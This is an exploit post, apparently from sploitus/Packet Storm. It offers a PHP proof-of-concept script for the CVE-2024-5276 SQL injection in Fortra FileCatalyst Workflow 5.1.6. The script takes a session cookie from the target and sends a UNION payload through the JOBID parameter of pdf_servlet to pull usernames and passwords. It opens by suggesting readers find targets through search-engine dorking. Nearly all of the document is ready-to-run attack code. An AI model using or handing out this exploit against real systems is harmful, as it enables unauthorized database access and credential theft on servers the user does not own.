## https://sploitus.com/exploit?id=PACKETSTORM:189796
=============================================================================================================================================
    | # Title     : Fortra FileCatalyst Workflow v5.1.6 Build 135 SQL Injection (CVE-2024-5276) - PHP PoC                                       |
    | # Author    : indoushka                                                                                                                   |
    | # Tested on : windows 10 Fr(Pro) / browser : Mozilla firefox 135.0.1 (64 bits)                                                            |
    | # Vendor    : https://www.fortra.com/fr/lignes-de-produit/filecatalyst                                                                    |
    =============================================================================================================================================
    
    POC :
    
    [+] Find targets by dorking in Google or another search engine.
    
    [+] Code Description:  The script first requests /workflow/ on the target and reads the JSESSIONID value from the Set-Cookie response header; it then sends the SQL payload, URL-encoded, in the JOBID parameter of /workflow/pdf_servlet with that cookie attached. "Success" is judged only by a substring match on the response ("Success" or "Admin"), so the verdict is a hint, not proof - inspect the raw response.
    	
    	( https://packetstorm.news/files/id/180866/ CVE-2024-5276)
    	
    [+] save code as poc.php.
    
    [+] Set Target : replace both ADD_TARGET_HERE placeholders (the SessionExtractor and Indoushka constructor calls; lines 48 and 120 of poc.php when saved from the <?php line).
    
    [+] Usage : php poc.php
    
    [+] PayLoad :
    
    <?php
    
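    class SessionExtractor {
        /** @var string Base URL of the target, without trailing slash. */
        private $target;
        /** @var string User-Agent sent with every request. */
        private $userAgent;
        /** @var string|null Last JSESSIONID extracted by getSessionId(); null until then. */
        private $jsessionid;

        /**
         * @param string $target Base URL of the FileCatalyst Workflow host (a trailing slash is stripped).
         */
        public function __construct($target) {
            $this->target = rtrim($target, '/');
            $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
        }

        /**
         * Performs a GET request and returns the raw response. Because CURLOPT_HEADER
         * and CURLOPT_FOLLOWLOCATION are both on, the result holds the header block of
         * every hop in a redirect chain followed by the final body.
         *
         * NOTE(security): certificate verification is disabled so the PoC also works
         * against self-signed lab hosts. Anyone on the network path can therefore read
         * or alter the traffic (including the session cookie); do not run this over an
         * untrusted network.
         *
         * @param string $url Absolute URL to fetch.
         * @return string Raw response. Terminates the script on a transport error.
         */
        private function sendRequest($url) {
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_USERAGENT => $this->userAgent,
                CURLOPT_FOLLOWLOCATION => true,
            ]);

            $response = curl_exec($ch);
            if ($response === false || curl_errno($ch)) {
                // Read the error before releasing the handle.
                $error = curl_error($ch);
                curl_close($ch);
                die("cURL Error: " . $error);
            }

            curl_close($ch);
            return $response;
        }

        /**
         * Extracts the JSESSIONID value from a raw cURL response.
         *
         * Only header lines are considered (the pattern is anchored at line start, so
         * text inside the HTML body is ignored), the value stops at ';' or end of line
         * even when the cookie carries no attributes, and when a redirect chain issued
         * several JSESSIONID cookies the LAST one is returned, since a later Set-Cookie
         * for the same name supersedes the earlier ones.
         *
         * @param string $rawResponse Response text as returned by cURL with CURLOPT_HEADER enabled.
         * @return string|null The cookie value, or null when no JSESSIONID header is present.
         */
        public static function parseSessionId($rawResponse) {
            $pattern = '/^Set-Cookie:\s*JSESSIONID=([^;\r\n]+)/im';
            if (!preg_match_all($pattern, (string) $rawResponse, $matches)) {
                return null;
            }

            $value = trim(end($matches[1]));
            return $value === '' ? null : $value;
        }

        /**
         * Requests /workflow/ on the target and records the JSESSIONID it issues.
         *
         * The value is cached in $this->jsessionid and also written to session.txt in
         * the current directory. That file holds a live session token for the target;
         * delete it when the test is over.
         *
         * @return string The extracted JSESSIONID. Terminates the script when none is found.
         */
        public function getSessionId() {
            echo "[*] Attempt to extract JSESSIONID...\n";
            $response = $this->sendRequest("{$this->target}/workflow/");

            $sessionId = self::parseSessionId($response);
            if ($sessionId === null) {
                die("[-] JSESSIONID not found. Check the link.\n");
            }

            $this->jsessionid = $sessionId;
            if (file_put_contents("session.txt", $sessionId) === false) {
                // Not fatal: the value is still cached and returned to the caller.
                echo "[!] Could not write session.txt\n";
            }
            echo "[+] Extracted JSESSIONID: {$sessionId}\n";
            return $sessionId;
        }
    }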
    
    // Phase 1: request /workflow/ on the target and capture the JSESSIONID it issues.
    // Replace ADD_TARGET_HERE with the host under test. getSessionId() also writes
    // the cookie to session.txt. The Indoushka run further down fetches its own
    // session, so the $jsessionid captured here is not reused by it.
    $extractor = new SessionExtractor('https://ADD_TARGET_HERE/');
    $jsessionid = $extractor->getSessionId();
    
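    class Indoushka {
        /** @var string Base URL of the target, without trailing slash. */
        private $target;
        /** @var string User-Agent sent with every request. */
        private $userAgent;
        /** @var string|null JSESSIONID obtained by getSessionId(); null until then. */
        private $jsessionid = null;

        /**
         * @param string $target Base URL of the FileCatalyst Workflow host (a trailing slash is stripped).
         */
        public function __construct($target) {
            $this->target = rtrim($target, '/');
            $this->userAgent = "Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36";
        }

        /**
         * Performs a GET request with optional extra headers and returns the raw
         * response. With CURLOPT_HEADER and CURLOPT_FOLLOWLOCATION on, the result holds
         * the header block of every hop in a redirect chain followed by the final body.
         *
         * NOTE(security): TLS certificate checks are disabled so the PoC works against
         * self-signed lab hosts; on an untrusted network path the session cookie passed
         * in $headers can therefore be intercepted.
         *
         * @param string   $url     Absolute URL to fetch.
         * @param string[] $headers Raw header lines, e.g. "Cookie: JSESSIONID=...".
         * @return string Raw response. Terminates the script on a transport error.
         */
        private function sendRequest($url, $headers = []) {
            $ch = curl_init();
            curl_setopt_array($ch, [
                CURLOPT_URL => $url,
                CURLOPT_RETURNTRANSFER => true,
                CURLOPT_HEADER => true,
                CURLOPT_FOLLOWLOCATION => true,  // follow redirects
                CURLOPT_SSL_VERIFYHOST => false,
                CURLOPT_SSL_VERIFYPEER => false,
                CURLOPT_USERAGENT => $this->userAgent,
                CURLOPT_HTTPHEADER => $headers,
            ]);

            $response = curl_exec($ch);
            if ($response === false || curl_errno($ch)) {
                // Read the error before releasing the handle.
                $error = curl_error($ch);
                curl_close($ch);
                die("CURL Error: " . $error);
            }
            curl_close($ch);

            return $response;
        }

        /**
         * Extracts the JSESSIONID value from a raw cURL response.
         *
         * Only header lines are considered (pattern anchored at line start), the value
         * stops at ';' or end of line even when the cookie has no attributes, and when
         * a redirect chain issued several JSESSIONID cookies the LAST one is returned,
         * since a later Set-Cookie for the same name supersedes the earlier ones.
         *
         * @param string $rawResponse Response text as returned by cURL with CURLOPT_HEADER enabled.
         * @return string|null The cookie value, or null when no JSESSIONID header is present.
         */
        public static function parseSessionId($rawResponse) {
            $pattern = '/^Set-Cookie:\s*JSESSIONID=([^;\r\n]+)/im';
            if (!preg_match_all($pattern, (string) $rawResponse, $matches)) {
                return null;
            }

            $value = trim(end($matches[1]));
            return $value === '' ? null : $value;
        }

        /**
         * Fetches /workflow/ and caches the JSESSIONID it issues in $this->jsessionid.
         * A second call is a no-op. Terminates the script when no cookie is found.
         *
         * @return void
         */
        public function getSessionId() {
            if ($this->jsessionid !== null) {
                echo "[*] JSESSIONID already extracted: {$this->jsessionid}\n";
                return;
            }

            echo "[*] Attempting to extract JSESSIONID...\n";
            $response = $this->sendRequest("{$this->target}/workflow/");

            $sessionId = self::parseSessionId($response);
            if ($sessionId === null) {
                die("[-] JSESSIONID not found. Check the link.\n");
            }

            $this->jsessionid = $sessionId;
            echo "[+] JSESSIONID extracted: {$sessionId}\n";
        }

        /**
         * Builds the pdf_servlet URL that carries the payload in the JOBID query parameter.
         *
         * @param string $payload Raw (unencoded) injection string.
         * @return string Absolute URL with the payload URL-encoded.
         */
        public function buildInjectionUrl($payload) {
            return "{$this->target}/workflow/pdf_servlet?JOBID=" . urlencode($payload);
        }

        /**
         * Heuristic used by injectSQL(): the response counts as a hit when it contains
         * the substring "Success" or "Admin". This is only an indicator - any ordinary
         * page that mentions "Admin" is a false positive, and an injection whose output
         * contains neither word is a false negative - so inspect the raw response
         * before drawing conclusions.
         *
         * @param string $response Raw HTTP response.
         * @return bool
         */
        public static function looksSuccessful($response) {
            return strpos($response, "Success") !== false
                || strpos($response, "Admin") !== false;
        }

        /**
         * Sends $payload through the JOBID parameter of /workflow/pdf_servlet with the
         * cached session cookie attached, and prints a verdict based on looksSuccessful().
         * getSessionId() must have been called first; otherwise the script terminates.
         *
         * @param string $payload Raw injection string; it is URL-encoded here.
         * @return void
         */
        public function injectSQL($payload) {
            if ($this->jsessionid === null) {
                die("[-] No session ID found. Run getSessionId() first.\n");
            }

            echo "[*] Sending SQL Injection payload...\n";

            $url = $this->buildInjectionUrl($payload);
            $headers = ["Cookie: JSESSIONID={$this->jsessionid}"];
            $response = $this->sendRequest($url, $headers);

            if (self::looksSuccessful($response)) {
                echo "[+] SQL Injection executed successfully!\n";
            } else {
                echo "[-] SQL Injection failed. Check input validity.\n";
            }
        }
    }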
    
    // Phase 2: run the injection. Replace ADD_TARGET_HERE with the same host used
    // above. Indoushka keeps its own cookie, so this issues a second /workflow/
    // request instead of reusing the $jsessionid captured earlier.
    $injector = new Indoushka('https://ADD_TARGET_HERE/');
    $injector->getSessionId();

    // Custom payload: a UNION probe. The table and column names (users, username,
    // password) are guesses about the backend schema, not established facts;
    // adjust them to the target.
    $payload = "' UNION SELECT username, password FROM users --";

    $injector->injectSQL($payload);
    ?>
    
    
    
    
    Greetings to :=====================================================================================
    jericho * Larry W. Cashdollar * LiquidWorm * Hussin-X * D4NB4R * Malvuln (John Page aka hyp3rlinx)|
    ===================================================================================================